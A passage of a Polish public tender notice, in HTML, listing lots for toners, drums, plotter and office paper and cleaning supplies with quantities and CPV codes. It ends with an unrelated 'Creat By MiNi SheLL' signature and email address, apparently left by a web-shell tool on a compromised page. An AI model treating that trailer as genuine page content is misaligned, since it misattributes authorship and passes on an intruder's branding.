7.	Toner błękitny - do - 6 szt.
- drukarki FS-C5350DN - nowo zakupione urządzenia na gwarancji
8.	Toner purpurowy - do - 6 szt.
- drukarki FS-C5350DN - nowo zakupione urządzenia na gwarancji
9.	Toner czarny - do - 10 szt.
- drukarki FS-C5030DN - nowo zakupione urządzenia na gwarancji
10.	Toner błękitny - do - 8 szt.
- drukarki FS-C5030DN - nowo zakupione urządzenia na gwarancji
11.	Toner purpurowy - do - 8 szt.
- drukarki FS-C5030DN - nowo zakupione urządzenia na gwarancji
12.	Toner żółty - do - 8 szt.
- drukarki FS-C5030DN - nowo zakupione urządzenia na gwarancji
13.	Toner czarny - do - 15 szt.
- drukarki FS-9530DN - nowo zakupione urządzenia na gwarancji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - TONERY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 6 - TONERY 
1.	Toner czarny - do - 15 szt.
- urządzenia wielofunkcyjnego Bizhub C253 - nowo zakupione urządzenia na gwarancji
2.	Toner błękitny - do - 10 szt.
- urządzenia wielofunkcyjnego Bizhub C253 - nowo zakupione urządzenia na gwarancji
3.	Toner purpurowy - do - 10 szt.
- urządzenia wielofunkcyjnego Bizhub C253 - nowo zakupione urządzenia na gwarancji
4.	Toner żółty - do - 10 szt.
- urządzenia wielofunkcyjnego Bizhub C253 - nowo zakupione urządzenia na gwarancji
5.	Toner niebieski - do - 8 szt.
- urządzenia wielofunkcyjnego Bizhub C280 - nowo zakupione urządzenia na gwarancji
- urządzenia wielofunkcyjnego OCE Variolink 2222C - nowo zakupione urządzenia na gwarancji
6.	Toner purpurowy - do - 8 szt.
- urządzenia wielofunkcyjnego Bizhub C280 - nowo zakupione urządzenia na gwarancji
- urządzenia wielofunkcyjnego OCE Variolink 2222C - nowo zakupione urządzenia na gwarancji
7.	Toner żółty - do - 8 szt.
- urządzenia wielofunkcyjnego Bizhub C280 - nowo zakupione urządzenia na gwarancji
- urządzenia wielofunkcyjnego OCE Variolink 2222C - nowo zakupione urządzenia na gwarancji
8.	Toner czarny - do - 10 szt.
- urządzenia wielofunkcyjnego Bizhub C280 - nowo zakupione urządzenia na gwarancji
- urządzenia wielofunkcyjnego OCE Variolink 2222C - nowo zakupione urządzenia na gwarancji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - TONERY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 7 - TONERY 
1.	Toner czarny - do  - 20 szt.
- drukarki E460DN - nowo zakupione urządzenia na gwarancji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - TONERY I BĘBNY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 8 - TONERY I BĘBNY
1.	Toner czarny  - do - 20 szt.
	- telefax BROTHER 2920 - nowo zakupione urządzenia na gwarancji
2.	Bęben do BROTHER 2920 - 12 szt.
- tylko oryginalny bęben Brother - nowo zakupione urządzenia na gwarancji
- opakowanie każdego bębna w folii + pudełko kartonowe;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 - TONERY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 9 - TONERY 
1.	Kaseta z czarnym tonerem - do - 20 szt.
- drukarki Lexmark C736DN - nowo zakupione urządzenia na gwarancji	
2.	Kaseta z żółtym tonerem - do - 15 szt.
- drukarki Lexmark C736DN - nowo zakupione urządzenia na gwarancji 	
3.	Kaseta z błękitnym tonerem - do - 15 szt.
- drukarki Lexmark C736DN  - nowo zakupione urządzenia na gwarancji	
4.	Kaseta z purpurowym tonerem - do - 15 szt.
- drukarki Lexmark C736DN - nowo zakupione urządzenia na gwarancji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - PAPIER DO PLOTERA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 10 - PAPIER DO PLOTERA
1.	Papier do plotera - 4 szt.
- Epson Stylus Pro 9700 - nowo zakupione urządzenia na gwarancji 		
2.	Papier premium matt do ploterów i drukarek - 14 szt. 
- Epson, Canon, HP, Lexmark - nowo zakupione urządzenia na gwarancji
3.	Papier real gloss G265 do ploterów i drukarek - 12 szt. 
- Epson Stylus Pro 9700 - nowo zakupione urządzenia na gwarancji 	
4.	Papier premium matt do ploterów i drukarek - 6 szt. 
- Epson, Canon, HP, Lexmark - nowo zakupione urządzenia na gwarancji
5.	Papier real gloss G265 do ploterów i drukarek - 6 szt.
- Epson Stylus Pro 9700 - nowo zakupione urządzenia na gwarancji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.43-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ZADANIE nr 11 - PAPIER.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE nr 11 - PAPIER 
1.	Papier komputerowy 250x12x4 -  20 ryz.
2.	Papier komputerowy 240x12x4 - 30 ryz.
3.	Papier A4- 1000 ryz.
4.	Papier A3-  150 ryz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1, 30.19.76.44-2, 30.19.93.10-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12 - INNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 12 - INNE 
1.	Sprężone powietrze: - 100 szt. 
2.	Pianka do czyszczenia plastiku  - 80 szt. 
3.	Płyn do czyszczenia monitorów LCD - 42 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.11.32.00-1, 30.23.72.50-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com